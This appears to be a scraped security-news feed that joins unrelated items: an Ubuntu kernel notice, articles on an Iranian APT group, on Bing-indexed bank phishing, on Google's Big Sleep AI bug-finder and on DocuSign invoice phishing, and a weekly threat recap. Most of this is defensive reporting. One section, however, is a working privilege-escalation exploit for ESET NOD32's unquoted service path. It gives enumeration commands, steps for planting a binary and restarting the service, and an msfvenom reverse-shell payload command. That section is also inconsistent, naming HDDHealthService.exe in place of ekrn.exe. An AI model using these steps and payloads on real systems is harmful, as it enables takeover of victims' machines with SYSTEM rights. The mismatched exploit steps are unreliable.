Ubuntu Security Notice 7088-2 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7088-2November 04, 2024linux-azure, linux-bluefield vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platformsDetails:Ziming Zhang discovered that the VMware Virtual GPU DRM driver in theLinux kernel contained an integer overflow vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2022-36402)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - CPU frequency scaling framework;  - Device frequency scaling framework;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - InfiniBand drivers;  - Input Device core drivers;  - Input Device (Miscellaneous) drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - EEPROM drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - BPF subsystem;  - Core kernel;  - DMA mapping infrastructure;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Simplified Mandatory Access Control Kernel framework;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-46714, CVE-2024-42288, CVE-2024-42290, CVE-2024-44987,CVE-2024-41090, CVE-2024-42313, CVE-2024-46689, CVE-2024-46737,CVE-2024-44946, CVE-2024-44999, CVE-2024-44935, CVE-2024-38602,CVE-2024-43883, CVE-2024-26607, CVE-2024-41091, CVE-2024-45025,CVE-2024-42305, CVE-2024-26891, CVE-2024-41073, CVE-2024-44969,CVE-2024-26641, CVE-2024-46719, CVE-2024-40929, CVE-2024-46721,CVE-2024-46740, CVE-2024-41012, CVE-2024-42280, CVE-2024-46738,CVE-2024-46722, CVE-2024-42246, CVE-2024-41063, CVE-2024-41072,CVE-2024-41068, CVE-2024-43884, CVE-2024-46758, CVE-2024-43861,CVE-2024-42306, CVE-2024-42285, CVE-2024-41065, CVE-2024-46818,CVE-2024-43894, CVE-2024-44954, CVE-2024-42310, CVE-2024-46829,CVE-2023-52614, CVE-2024-47663, CVE-2024-42281, CVE-2024-42297,CVE-2024-46800, CVE-2024-44960, CVE-2024-44952, CVE-2024-46747,CVE-2024-42286, CVE-2024-41071, CVE-2024-43893, CVE-2023-52531,CVE-2024-43860, CVE-2024-46840, CVE-2024-41011, CVE-2024-43890,CVE-2024-45026, CVE-2024-42292, CVE-2024-27051, CVE-2024-41015,CVE-2024-47668, CVE-2024-46817, CVE-2024-43846, CVE-2024-44988,CVE-2024-44944, CVE-2024-43829, CVE-2024-45021, CVE-2024-43914,CVE-2024-43856, CVE-2024-46673, CVE-2024-46771, CVE-2024-41081,CVE-2024-43830, CVE-2024-43839, CVE-2024-43853, CVE-2024-47669,CVE-2024-42244, CVE-2021-47212, CVE-2024-46844, CVE-2024-44965,CVE-2024-41059, CVE-2024-46783, CVE-2024-42295, CVE-2024-35848,CVE-2024-41017, CVE-2024-47659, CVE-2024-42309, CVE-2024-26800,CVE-2024-41064, CVE-2024-43879, CVE-2024-46679, CVE-2024-43854,CVE-2024-41022, CVE-2024-43858, CVE-2024-46739, CVE-2024-46685,CVE-2024-42289, CVE-2024-44998, CVE-2024-46761, CVE-2024-46677,CVE-2024-42131, CVE-2024-46815, CVE-2024-46777, CVE-2024-43880,CVE-2024-42276, CVE-2024-42265, CVE-2024-46723, CVE-2024-42259,CVE-2024-45028, CVE-2024-42229, CVE-2024-42283, CVE-2024-44948,CVE-2024-44995, CVE-2024-46757, CVE-2024-46822, CVE-2024-45006,CVE-2024-46780, CVE-2024-26668, CVE-2024-42284, CVE-2024-46782,CVE-2024-46781, CVE-2024-43871, CVE-2024-42304, CVE-2024-42311,CVE-2024-45003, CVE-2024-46745, CVE-2024-41098, CVE-2024-46750,CVE-2024-47667, CVE-2024-41020, CVE-2024-26640, CVE-2024-41070,CVE-2024-42301, CVE-2024-43882, CVE-2024-45008, CVE-2024-26885,CVE-2024-42287, CVE-2024-46744, CVE-2024-43908, CVE-2024-46798,CVE-2023-52918, CVE-2024-36484, CVE-2024-43841, CVE-2024-41042,CVE-2024-38611, CVE-2024-43867, CVE-2024-26669, CVE-2024-42271,CVE-2024-46756, CVE-2024-44947, CVE-2024-43835, CVE-2024-46676,CVE-2024-46743, CVE-2024-46759, CVE-2024-46675, CVE-2024-46828,CVE-2024-46755)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1094-bluefield  5.4.0-1094.101  linux-image-5.4.0-1139-azure    5.4.0-1139.146  linux-image-azure-lts-20.04     5.4.0.1139.133  linux-image-bluefield           5.4.0.1094.90After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7088-2  https://ubuntu.com/security/notices/USN-7088-1  CVE-2021-47212, CVE-2022-36402, CVE-2023-52531, CVE-2023-52614,  CVE-2023-52918, CVE-2024-26607, CVE-2024-26640, CVE-2024-26641,  CVE-2024-26668, CVE-2024-26669, CVE-2024-26800, CVE-2024-26885,  CVE-2024-26891, CVE-2024-27051, CVE-2024-35848, CVE-2024-36484,  CVE-2024-38602, CVE-2024-38611, CVE-2024-40929, CVE-2024-41011,  CVE-2024-41012, CVE-2024-41015, CVE-2024-41017, CVE-2024-41020,  CVE-2024-41022, CVE-2024-41042, CVE-2024-41059, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41068, CVE-2024-41070,  CVE-2024-41071, CVE-2024-41072, CVE-2024-41073, CVE-2024-41081,  CVE-2024-41090, CVE-2024-41091, CVE-2024-41098, CVE-2024-42131,  CVE-2024-42229, CVE-2024-42244, CVE-2024-42246, CVE-2024-42259,  CVE-2024-42265, CVE-2024-42271, CVE-2024-42276, CVE-2024-42280,  CVE-2024-42281, CVE-2024-42283, CVE-2024-42284, CVE-2024-42285,  CVE-2024-42286, CVE-2024-42287, CVE-2024-42288, CVE-2024-42289,  CVE-2024-42290, CVE-2024-42292, CVE-2024-42295, CVE-2024-42297,  CVE-2024-42301, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42313,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43835, CVE-2024-43839,  CVE-2024-43841, CVE-2024-43846, CVE-2024-43853, CVE-2024-43854,  CVE-2024-43856, CVE-2024-43858, CVE-2024-43860, CVE-2024-43861,  CVE-2024-43867, CVE-2024-43871, CVE-2024-43879, CVE-2024-43880,  CVE-2024-43882, CVE-2024-43883, CVE-2024-43884, CVE-2024-43890,  CVE-2024-43893, CVE-2024-43894, CVE-2024-43908, CVE-2024-43914,  CVE-2024-44935, CVE-2024-44944, CVE-2024-44946, CVE-2024-44947,  CVE-2024-44948, CVE-2024-44952, CVE-2024-44954, CVE-2024-44960,  CVE-2024-44965, CVE-2024-44969, CVE-2024-44987, CVE-2024-44988,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45008, CVE-2024-45021, CVE-2024-45025,  CVE-2024-45026, CVE-2024-45028, CVE-2024-46673, CVE-2024-46675,  CVE-2024-46676, CVE-2024-46677, CVE-2024-46679, CVE-2024-46685,  CVE-2024-46689, CVE-2024-46714, CVE-2024-46719, CVE-2024-46721,  CVE-2024-46722, CVE-2024-46723, CVE-2024-46737, CVE-2024-46738,  CVE-2024-46739, CVE-2024-46740, CVE-2024-46743, CVE-2024-46744,  CVE-2024-46745, CVE-2024-46747, CVE-2024-46750, CVE-2024-46755,  CVE-2024-46756, CVE-2024-46757, CVE-2024-46758, CVE-2024-46759,  CVE-2024-46761, CVE-2024-46771, CVE-2024-46777, CVE-2024-46780,  CVE-2024-46781, CVE-2024-46782, CVE-2024-46783, CVE-2024-46798,  CVE-2024-46800, CVE-2024-46815, CVE-2024-46817, CVE-2024-46818,  CVE-2024-46822, CVE-2024-46828, CVE-2024-46829, CVE-2024-46840,  CVE-2024-46844, CVE-2024-47659, CVE-2024-47663, CVE-2024-47667,  CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1140.147  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1095.102

Ubuntu Security Notice USN-7088-2

The Iran-linked group Emennet Pasargad aims to undermine public confidence in Israeli and Western nations by using hack-and-leak campaigns and disrupting government services, including elections.

Source: Muhammad Toqueer via Shutterstock

An Iranian cyber-operations group, Emennet Pasargad — also known as Cotton Sandstorm — has broadened its attacks, expanding its targets beyond Israel and the United States and targeting new IT assets, such as IP cameras.

In an advisory published last week, the US Departments of Justice and Treasury — along with the Israel National Cyber Directorate (INCD) — called out the change in tactics and noted that the group had provided resources and infrastructure services to Middle Eastern threat groups by operating as a legitimate company, Aria Sepehr Ayandehsazan (ASA). In addition, since the beginning of the year, Emennet Pasargad has scanned for IP cameras, targeted organizations in France and Sweden, and actively probed a variety of election sites and systems, according to the government advisory.

"Similar to the Emennet campaign that targeted the 2020 U.S. Presidential election, the FBI judges the group's recent campaigns include a mix of computer intrusion activity and exaggerated or fictitious claims of access to victim networks or stolen data to enhance the psychological effects of their operations," the advisory stated.

The latest intelligence highlights Iran's increasing use of cyber operations as a way to target its perceived enemies. In 2020 and 2022, Emennet Pasargad created disinformation campaigns to target the US presidential and midterm elections, posing as Proud Boys volunteers and sending fake videos to Republican lawmakers. The US Department of Justice indicted two Iranian nationals for the crimes, as well as for sending threats through email and attempting to hack election websites.

Related:DPRK Uses Microsoft Zero-Day in No-Click Toast Attacks

Over the past year, Iran has stepped up its attempts to use cyberattacks to disrupt its enemies using bolder tactics, says John Fokker, head of threat intelligence for Trellix, a threat detection and response firm.

"Since October 2023, the beginning of the Israeli-Palestine crisis, Iranian hackers have intensified their activities against the United States and Israel, targeting critical sectors such as government, energy, and finance," he says. "We have observed Iran-linked actors disrupting organizations by stealing sensitive data, conducting denial-of-service attacks, and also deploying destructive malware such as ransomware or wiper strains, like the Handala wiper."

**Iranian Cyberattackers Broaden Their Sights**

Emennet Pasargad often operates by posing as a legitimate IT services company, ASA, as a front for accessing large language model (LLM) services and to scan and harvest data on IP cameras. The group has "used several cover hosting providers for infrastructure management and obfuscation," the Joint Cybersecurity Advisory added.

Related:South Korean APT Exploits 1-Click WPS Office Bug, Nabs Chinese Intel

The use of a cover organization to hide operations and make them seem legitimate is a common approach for Iranian threat actors, says Tomer Bar, vice president of security research at SafeBreach, a breach and attack simulation platform provider which has offices in Tel Aviv. For instance, Charming Kitten, or APT35, conducted reconnaissance and attacks under the guise of two companies, Najee Technology and Afkar System, which were sanctioned by the US Treasury Department in 2022.

"The usage of a cover company is not new, and it has been used by Iran both for espionage and distractive purposes," Bar says.

It also gives groups the ability to use commercial services as part of their infrastructure and hide their activities — for a time, says Trellix's Fokker.

"Threat actors have to acquire resources, software and hosting for their illicit activities," he says. "Having a 'legitimate' front company will make it easier to acquire these services and can serve as additional backstopping to give a plausible deniability."

**Governments, Businesses Should Take Stock**

The changing tactics underscore that organizations need to continually adjust their defenses to head off threat groups. Companies and government agencies should only buy technology and software from trusted vendors, and should make sure that those vendors have their own supply chain validation and vulnerability-remediation processes.

Related:BlankBot Trojan Targets Turkish Android Users

The Joint Cybersecurity Advisory called for organizations to review any successful authentications to network or cloud services that come from virtual private network services, such as Private Internet Access, ExpressVPN, and NordVPN. In addition to regularly applying updates and creating a resilient backup process, companies should consider deploying a "demilitarized zone" (DMZ) between any internet-facing assets and the corporate network, validating user input, and implementing least-privilege policies across their networks and applications.

SafeBreach has encountered attackers regularly scanning LinkedIn for workers who update their profiles with a new position, sending a spear-phishing text or email as a company administrator requesting that they log into a corporate system. The attackers then capture the victim's credentials through a malicious link.

Trellix's Fokker also stressed that companies should focus on their connected devices, applying patches for cameras and other hardware, using network segmentation to protect them, and regularly scanning their own IP space, before an attacker does.

"More and more governments are exploring the proactive scanning of IP spaces and notification of domestic organizations as an additional layer on top of stronger manufacturer requirements," he says. "First and foremost, it should be the responsibility of the organization itself. However, it will help if the government assists in this process and alerts unknowing organizations of their vulnerable cameras."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Iranian APT Group Targets IP Cameras, Extends Attacks Beyond Israel

If you searched for your bank's login page via Bing recently, you may have visited a fraudulent website enabling criminals to get your credentials and even your two-factor security code.

We identified a new wave of phishing for banking credentials that targets consumers via Microsoft’s search engine. A Bing search query for ‘Keybank login’ currently returns malicious links on the first page, and sometimes as the top search result. We have reported the fraudulent sites to Microsoft already.

While Microsoft’s Bing only has about 4% of the search engine market share, crooks are drawn to it as an alternative to Google. One particularly interesting detail is how a phishing website created barely two weeks ago is already indexed and displayed before the official one.

In this blog post, we take a look at how criminals are abusing Bing and stay under the radar at the same time while also bypassing advanced security features such as two-factor authentication.

**Bing search engine poisoning**

We first noticed a phishing campaign coming from Bing’s search engine and targeting Keybank customers on November 29. A malicious link is displayed as the first result and pretends to be Keybank’s login page.

The domain name used is _ixx-kexxx\[.\]com_ which was registered on November 15. Given that it is only two weeks old and yet came up before _ibx.key.com_ (the real website), we surmise that the attackers are abusing Bing’s search algorithms.

**Indexing and cloaking in one go**

Upon clicking on the link, users are redirected to a friendly and helpful website before getting redirected again to the actual phishing page. However, we need to pause right here in order to see a couple of “blackhat” techniques.

That first page is only meant for crawlers and scanners (and users who aren’t of interest) which will both scrape the content and index it, as well as see that the page is clean. This technique is fairly common, and we actually see similar examples with ad fraud. The idea is about creating content that looks real, like a blog, but with malicious intent (monetization or other).

Actual victims do not get to see that page because they are immediately redirected to another website, this time completely malicious. The redirect happens server-side based on user attributes such as their browser profile, IP address and others.

That page uses the official branding and is a login portal for KeyBank. Once a victim types their user ID and password, criminals will receive the data immediately. Note that the phishing site is using https, which means strictly nothing here (the information will be encrypted while in transit but received in clear text by the recipient).

**Bypassing multi factor authentication**

In some phishing campaigns, criminals are notified in real time when a new victim attempts to login into their fraudulent page. One thing we noticed on the phishing page after the first screen, was a message claiming that the internet connection was poor. This is a disguise for what’s happening behind the scenes:

It’s often necessary for criminals to get past a few hurdles first. They need to login from the same location as the victim (their fake site gives them the IP address and they can use a proxy) and they may need to get through multi-factor authentication. Sometimes, the easiest thing to do is simply to ask for it.

Multi-factor authentication is still highly recommended, but users should be aware that criminals can directly ask for verification codes while pretending to be the real bank. We should also note that SMS verification is one of the weakest methods for two-factor authentication.

Security questions (usually 3 of them) are also used to either reset a password or for some other verification purpose (maybe a login from a new browser or location). This phishing kit also asks the victims to enter that information:

**Conclusion**

Phishing is one of the biggest threats consumers face every day. Malicious links can be sent to them via email, text message, social media or they may simply come across them via a search engine.

In this particular example, Bing was tricked into indexing a website that looked legitimate but turned out to be a gateway to a phishing portal. As the domain name was unknown to Microsoft at the time, it failed to protect users.

We highly recommend anyone to adopt more phishing-proof ways to login into important websites. Passkeys come to mind immediately since they do not involve passwords at all. In other words, if you don’t need to type a password… there’s no password to steal.

Unfortunately, not all websites offer the latest technologies to protect their customers. While it is important to add a second factor for authentication, you may want to upgrade to an Authenticator app, instead of the less trustworthy SMS verification. Perhaps the most important thing to remember is that criminals can also try to request those one-time codes from you and you should always be extremely vigilant before entering them in any online website (or replying to an unknown text).

Malwarebytes Browser Guard already protected users from this phishing campaign without having seen the malicious websites before. This is because of the built-in anti-phishing heuristic rules which intercept the connection and display a warning message:

If you suspect your banking information has already been stolen, try to take action as quickly as possible by contacting your financial institution(s) and resetting all your passwords (especially if you reused any of them for different websites).

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

**Indicators of Compromise**

Cloaking domains

ixx-kexxx\[.\]com

Phishing domains

xxx-ii-news\[.\]net  
xxx-ii-news\[.\]com  
ixxx-blognew\[.\]com  
xxx-ii-news\[.\]net  
new-bllog-i\[.\]com  
info-blog-news\[.\]com  
xv-bloging-info\[.\]com  
xxx-new-videos\[.\]com

Hosting server

200.107.207\[.\]232

 Crooks bank on Microsoft&#8217;s search engine to phish customers 

ESET NOD32 Antivirus version 18.0.12.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 18.0.12.0 - "ESET Service" UnquotedService Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-11-02# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor : https://www.eset.com# Version : 18.0.12.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).Description:==============================ESET NOD32 Antivirus installs a service with an unquoted service path.To properly exploit this vulnerability, the local attacker must insert anexecutable file in the path of the service.Upon service restart or system reboot, the malicious code will be run withelevated privileges.# PoC===========1.  Open CMD and check for the vulnerability by typing [ wmic service getname,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v"c:\windows\\" | findstr /i /v """ ]2.  The vulnerable service would show up.3.  Check the service permissions by typing [ sc qc "ekrn" ]4.  The command would return..C:\Users\Ci3c0>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem5.  This concludes that the service is running as SYSTEM.6.  Now create a payload with msfvenom or other tools and name it toekrn.exe.7.  Make sure you have write permissions to "C:\Program Files\ESET\ESETSecurity" directory.8.  Provided that you have right permissions, drop the HDDHealthService.exeexecutable you created into the "C:\Program Files\ESET\ESET Security"directory.9.  Start a listener.9.  Now restart the ekrn service by giving coommand [ sc stop ekrn ]followed by [ sc start ekrn ]9.1 If you cannot stop and start the service, since the service is of type"AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ]and get the shell when the service starts automatically.10. Got shell.During my testing :Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o ekrn.exe# Disclaimer=============The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.The author is not responsible for any misuse of the information containedherein and accepts no responsibility for any damage caused by the use ormisuse of this information.The author prohibits any malicious use of security related information orexploits by the author or elsewhere.

ESET NOD32 Antivirus 18.0.12.0 Unquoted Service Path

A research tool by the company found a vulnerability in the SQLite open source database, demonstrating the "defensive potential" for using LLMs to find vulnerabilities in applications before they're publicly released.

Source: Krot Studio via Alamy Stock Photo

Google has discovered its first real-world vulnerability using an artificial intelligence (AI) agent that company researchers are designing expressly for this purpose. The discovery of a memory-safety flaw in a production version of a popular open source database by the company's Big Sleep large language model (LLM) project is the first of its kind, and it has "tremendous defensive potential" for organizations, the Big Sleep team wrote in a recent Project Zero blog.

Big Sleep — the work of a collaboration between the company's Project Zero and Deep Mind groups — discovered an exploitable stack buffer underflow in SQLite, a widely used open source database engine.

Specifically, Big Sleep discovered a pattern in the code of a publicly released version of SQLite that creates a potential edge case that needs to be handled by all code that uses the field, the researchers noted. A function in the code failed to correctly handle the edge case, "resulting in a write into a stack buffer with a negative index when handling a query with a constraint on the 'rowid' column," thus creating an exploitable flaw, according to the post.

Google reported the bug to SQLite developers in early October. They fixed it on the same day and before it appeared in an official release of the database, so users were not affected.

Related:News Desk 2024: Hacking Microsoft Copilot Is Scary Easy

**Inspired by AI Bug-Hunting Peers**

"We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software," the Big Sleep team wrote in the post. While this may be true, it's not the first time an LLM-based reasoning system autonomously found a flaw in the SQLite database engine, Google acknowledged.

An LLM model called Atlantis from a group of AI experts called Team Atlanta discovered six zero-day flaws in SQLite3 and even autonomously identified and patched one of them during the AI Cyber Challenge organized by ARPA-H, DARPA, and the White House, the team revealed in a blog post in August.

In fact, the Big Sleep team used one of the Team Atlanta discoveries — of "a null-pointer dereference" flaw in SQLite —  to inspire them to use AI "to see if we could find a more serious vulnerability," according to the post.

**Software Review Goes Beyond Fuzzing**

Google and other software development teams already use a process called fuzz-testing, colloquially known as "fuzzing," to help find flaws in applications before release. Fuzzing is an approach that targets the software with deliberately malformed data — or inputs — to see if it will crash so they can investigate and fix the cause.

Related:Privacy Anxiety Pushes Microsoft Recall AI Release Again

In fact, Google earlier this year released an AI-boosted fuzzing framework as an open source resource to help developers and researchers improve how they find software vulnerabilities. The framework automates manual aspects of fuzz-testing and uses LLMs to write project-specific code to boost code coverage.

While fuzzing "has helped significantly" to reduce the number of flaws in production software, developers need a more powerful approach "to find the bugs that are difficult (or impossible) to find" in this way, such as variants for previously found and patched vulnerabilities, the Big Sleep team wrote.

"As this trend continues, it's clear that fuzzing is not succeeding at catching such variants, and that for attackers, manual variant analysis is a cost-effective approach," the team wrote in the post.

Moreover, variant analysis is a better fit for current LLMs because its provides them with a starting point —  such as the details of a previously fixed flaw — for a search, and thus removes a lot of ambiguity from AI-based vulnerability testing, according to Google. In fact, at this point in the evolution of LLMs, lack of this type of starting point for a search can cause confusion, they noted.

Related:OWASP Releases AI Security Guidance

"We're hopeful that AI can narrow this gap," the Big Sleep team wrote. "We think that this is a promising path towards finally turning the tables and achieving an asymmetric advantage for defenders."

**Glimpse Into the Future**

Google Big Sleep is still in its research phase, and using AI-based automation to identify software flaws overall is a new discipline. However, there already are tools available that developers can use to get a jump on finding vulnerabilities in software code before public release.

Late last month, researchers at Protect AI released Vulnhuntr, a free, open source static code analyzer tool that can find zero-day vulnerabilities in Python codebases using Anthropic's Claude artificial intelligence (AI) model.

Indeed, Google's discovery shows promising progress for the future of using AI to help developers troubleshoot software before letting flaws seep into production versions.

"Finding vulnerabilities in software before it's even released means that there's no scope for attackers to compete: the vulnerabilities are fixed before attackers even have a chance to use them," Google's Big Sleep team wrote.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Google: Big Sleep AI Agent Puts SQLite Software Bug to Bed

Scammers are exploiting DocuSign’s APIs to send realistic fake invoices, primarily targeting security software like Norton. This phishing…

Scammers are exploiting DocuSign’s APIs to send realistic fake invoices, primarily targeting security software like Norton. This phishing technique bypasses traditional email spam filters by originating from legitimate DocuSign accounts and templates, making detection challenging.

Cybersecurity researchers at automated API security solutions provider, Wallarm, have revealed a new threat exploiting DocuSign APIs to send phishing invoices. The company reports that cybercriminals are employing a new phishing technique that leverages the legitimacy of DocuSign’s platform. By exploiting DocuSign’s APIs, attackers send highly authentic-looking fake invoices that evade traditional email filters.

This clever approach increases the risk for organizations and unsuspecting users, as it capitalizes on the trust associated with reputable platforms, making detection quite challenging.

In its latest blog post shared exclusively with Hackread.com ahead of its publishing on Monday, the modus operandi of these attacks involves the creation of paid DocuSign accounts. These accounts grant attackers the ability to modify templates and utilize APIs for automated document generation and distribution.

By customizing official DocuSign templates to mimic **well-known brands**, such as cybersecurity giant Norton, cybercriminals can create convincing invoices that are difficult to distinguish from legitimate communications. The automation capabilities provided by DocuSign’s APIs enable attackers to efficiently distribute these fraudulent invoices at scale, maximizing their potential impact. It happens because DocuSign’s API-friendly environment allows attackers to customize invoices to match company branding.

Fake Norton invoices (Screenshot via Wallarm)

“These fake invoices may contain accurate pricing for the products to make them appear authentic, along with additional charges, like a $50 activation fee. Other scenarios include direct wire instructions or purchase orders,” the **blog post** read.

The consequences of these attacks are major. Victims may e-sign fraudulent invoices, authorizing unauthorized payments. Furthermore, the legitimacy of DocuSign’s platform allows phishing emails to bypass traditional spam filters, increasing the chance of successful delivery. 

****Mitigating and Protection****

To mitigate the risks associated with these attacks, organizations must adopt a multi-faceted approach. Firstly, it is important to verify the authenticity of sender credentials, including email addresses and sender accounts. Implementing strict internal approval processes for financial transactions can also help prevent unauthorized payments.

Additionally, organizations should prioritize **employee awareness training** to educate staff about this increasing threat. By regularly monitoring for irregularities in invoices, such as unexpected charges or unusual requests, organizations can identify and respond to potential threats. Finally, following **DocuSign’s anti-phishing guidelines** can provide additional protection.

1.  **Microsoft Warns of Tax Returns Phishing Scams**
2.  **Blank Images Used to Evade Anti-Malware Checks**
3.  **Scammers using Google Docs exploit in phishing links**
4.  **Microsoft Office Most Exploited Software in Malware Attacks**
5.  **LinkedIn Phishing Scam Steals Gmail Credentials Via Google Docs**

Scammers Use DocuSign API to Evade Spam Filters with Phishing Invoices

This week was a total digital dumpster fire! Hackers were like, "Let's cause some chaos!" and went after everything from our browsers to those fancy cameras that zoom and spin. (You know, the ones they use in spy movies? 🕵️‍♀️)
We're talking password-stealing bots, sneaky extensions that spy on you, and even cloud-hacking ninjas! 🥷 It's enough to make you want to chuck your phone in the ocean.

Weekly Recap / Cybersecurity

This week was a total digital dumpster fire! Hackers were like, "Let's cause some chaos!" and went after everything from our browsers to those fancy cameras that zoom and spin. (You know, the ones they use in spy movies? 🕵️‍♀️)

We're talking password-stealing bots, sneaky extensions that spy on you, and even cloud-hacking ninjas! 🥷 It's enough to make you want to chuck your phone in the ocean. (But don't do that, you need it to read this newsletter!)

The good news? We've got the inside scoop on all the latest drama. Think of this newsletter as your cheat sheet for surviving the digital apocalypse. We'll break down the biggest threats and give you the knowledge to outsmart those pesky hackers. Let's go!

****⚡ Threat of the Week****

**North Korean Hackers Deploy Play Ransomware:** In what's a sign of blurring boundaries between nation-state groups and cybercrime actors, it has emerged that the North Korean state-sponsored hacking crew called **Andariel** likely collaborated with the Play ransomware actors in a digital extortion attack that took place in September 2024. The initial compromise occurred in May 2024. The incident overlaps with an intrusion set that involved targeting three different organizations in the U.S. in August 2024 as part of a likely financially motivated attack.

 **Upgrade Your Cybersecurity Skills with SANS at CDI 2024 + Get a $1,950 Bonus!**

Unlock top-tier cybersecurity training at SANS CDI 2024, December 13-18 in Washington, DC. With over 40 expert-led courses, you'll gain practical skills and a $1,950 bonus, including extended lab access and a GIAC certification attempt when you train in-person! Offer ends November 11.

Boost Your Skills Now!****🔔 Top News****

*   **Chinese Threat Actor Uses Quad7 Botnet for Password Spraying:** A Chinese threat actor tracked by Microsoft as Storm-0940 is leveraging a botnet called Quad7 (aka CovertNetwork-1658) to orchestrate highly evasive password spray attacks. The attacks pave the way for the theft of credentials from multiple Microsoft customers, which are then used for infiltrating networks and conducting post-exploitation activities.
*   **Opera Fixed Bug That Could Have Exposed Sensitive Data:** A fresh browser attack named CrossBarking has been disclosed in the Opera web browser that compromises private application programming interfaces (APIs) to allow unauthorized access to sensitive data. The attack works by using a malicious browser extension to run malicious code in the context of sites with access to those private APIs. These sites include Opera's own sub-domains as well as third-party domains such as Instagram, VK, and Yandex.
*   **Evasive Panda Uses New Tool for Exfiltrating Cloud Data:** The China-linked threat actor known as Evasive Panda infected a government entity and a religious organization in Taiwan with a new post-compromise toolset codenamed CloudScout that allows for stealing data from Google Drive, Gmail, and Outlook. The activity was detected between May 2022 and February 2023.
